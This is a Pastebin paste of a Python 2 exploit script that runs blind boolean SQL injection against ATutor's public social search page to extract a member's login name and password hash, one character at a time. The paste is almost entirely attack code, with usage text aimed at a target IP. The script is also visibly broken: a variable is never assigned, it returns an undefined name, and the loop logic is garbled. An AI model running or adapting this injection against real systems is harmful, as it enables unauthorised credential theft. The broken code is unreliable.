Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- def inject(r, inj, ip):
- extracted = ""
- for i in range(1, r):
- injection_string = "test'/**/or/**/(ascii(substring((%s),%d,1)))=[CHAR]/**/or/**/1='" % (inj.replace("[CHAR]", str(i)),i)
- #retrieved_value = searchFriends_sqli(ip, injection_string)
- for j in range(32, 126):
- # now we update the sqli
- target = "http://%s/ATutor/mods/_standard/social/index_public.php?q=%s" % (ip, injection_string.replace("[CHAR]", str(j)))
- r = requests.get(target)
- print r.headers
- content_length = int(r.headers['Content-Length'])
- if (content_length > 20):
- return j
- if(retrieved_value):
- extracted += chr(retrieved_value)
- extracted_char = chr(retrieved_value)
- sys.stdout.write(extracted_char)
- sys.stdout.flush()
- else:
- print "\n(+) done!"
- break
- else:
- return None
- return z
- def main():
- if len(sys.argv) != 2:
- print "(+) usage: %s <target>" % sys.argv[0]
- print '(+) eg: %s 192.168.121.103' % sys.argv[0]
- sys.exit(-1)
- ip = sys.argv[1]
- print "(+) Retrieving username...."
- query = 'select/**/login/**/from/**/AT_members/**/where/**/status=3/**/limit/**/1'
- username = inject(50, query, ip)
- print "(+) Retrieving password hash...."
- query = 'select/**/password/**/from/**/AT_members/**/where/**/login/**/=/**/\'%s\'' % (username)
- password = inject(50, query, ip)
- print "(+) Credentials: %s / %s" % (username, password)
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement